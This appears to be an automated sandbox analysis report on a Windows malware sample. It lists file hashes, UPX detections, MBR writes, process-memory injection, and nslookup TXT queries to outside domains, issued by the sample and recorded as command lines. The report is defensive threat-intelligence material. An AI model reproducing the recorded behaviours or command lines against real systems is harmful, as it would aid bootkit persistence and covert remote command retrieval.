Analysis
-
max time kernel
141s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2024 02:41
Behavioral task
behavioral1
Sample
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
Resource
win10v2004-20240611-en
General
-
Target
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe
-
Size
10.4MB
-
MD5
806b4399e2524e0c38ea076a4f5c4154
-
SHA1
0e133677799df2506404dc4b6e992179bdbe9f3f
-
SHA256
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f
-
SHA512
1d60fc9940e96efb0d8a1c8bede83842872fb981f4c3b8c7b74c38ca18c9ada92ea8262967128c951c1543a11f585244c6d45bc41ef8292a015036d651b8bc0b
-
SSDEEP
196608:KaUo1YyjJpXQlXZMJ0MowNZYx4S0BVoKLBFSlMDqAu7/1f6b+QFH2m5Yn10Cd:Kto1YaXQlXZw0M3zYy1oKDSlMLu7Ne/Q
Malware Config
Signatures
-
UPX dump on OEP (original entry point) 31 IoCs
Processes:
resource yara_rule behavioral2/memory/4956-0-0x0000000000400000-0x000000000104B000-memory.dmp UPX behavioral2/memory/4956-6-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-8-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-15-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-51-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-52-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-54-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-53-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-49-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-47-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-45-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-43-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-41-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-40-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-35-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-33-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-29-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-27-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-23-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-21-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-20-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-18-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-13-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-11-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-10-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-9-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-37-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-31-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-25-0x0000000010000000-0x000000001003E000-memory.dmp UPX behavioral2/memory/4956-60-0x0000000000400000-0x000000000104B000-memory.dmp UPX behavioral2/memory/4956-68-0x0000000000400000-0x000000000104B000-memory.dmp UPX -
Loads dropped DLL 1 IoCs
Processes:
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exepid process 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe -
Processes:
resource yara_rule behavioral2/memory/4956-0-0x0000000000400000-0x000000000104B000-memory.dmp upx behavioral2/memory/4956-6-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-8-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-15-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-51-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-52-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-54-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-53-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-49-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-47-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-45-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-43-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-41-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-40-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-35-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-33-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-29-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-27-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-23-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-21-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-20-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-18-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-13-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-11-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-10-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-9-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-37-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-31-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-25-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4956-60-0x0000000000400000-0x000000000104B000-memory.dmp upx behavioral2/memory/4956-68-0x0000000000400000-0x000000000104B000-memory.dmp upx -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exedescription ioc process File opened for modification \??\PhysicalDrive0 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exepid process 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exepid process 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exepid process 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exedescription pid process target process PID 4956 wrote to memory of 5048 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe nslookup.exe PID 4956 wrote to memory of 5048 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe nslookup.exe PID 4956 wrote to memory of 5048 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe nslookup.exe PID 4956 wrote to memory of 4452 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe nslookup.exe PID 4956 wrote to memory of 4452 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe nslookup.exe PID 4956 wrote to memory of 4452 4956 f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe"C:\Users\Admin\AppData\Local\Temp\f069c599fb95c28f7f92c4ecd5a7472efa44471f8d38ec6628b116d8518e5d3f.exe"1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=TXT dlf.cps5.com2⤵
-
C:\Windows\SysWOW64\nslookup.exenslookup -qt=TXT dlwebf.cps5.com2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4192,i,2029050989380753659,15333598055019363793,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\E2EECore.3.3.9.dllFilesize
10.6MB
MD550c266e46ccf9bc8956279f78d51f205
SHA10ba5b98a91a9a019cd9b87cf01796c65ee6a0839
SHA256c58e066a293ff260037487d37e37bf3d890c16383d817c7573dab51c514cbd00
SHA5127350a82820faeba3172fad3d87b04c6a2967b797a321a78a53e7156c37fed4661a66d2f78e2f3ddbcbc0d10a56f5d761f7eb761f05d2841568b34841c17e0d37
-
memory/4956-33-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-53-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-8-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-29-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-51-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-52-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-54-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-27-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-49-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-47-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-45-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-43-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-41-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-23-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-35-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-0-0x0000000000400000-0x000000000104B000-memory.dmpFilesize
12.3MB
-
memory/4956-15-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-6-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-40-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-21-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-20-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-18-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-13-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-11-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-10-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-9-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-37-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-31-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-25-0x0000000010000000-0x000000001003E000-memory.dmpFilesize
248KB
-
memory/4956-55-0x0000000076FC3000-0x0000000076FC4000-memory.dmpFilesize
4KB
-
memory/4956-60-0x0000000000400000-0x000000000104B000-memory.dmpFilesize
12.3MB
-
memory/4956-62-0x0000000076FC3000-0x0000000076FC4000-memory.dmpFilesize
4KB
-
memory/4956-68-0x0000000000400000-0x000000000104B000-memory.dmpFilesize
12.3MB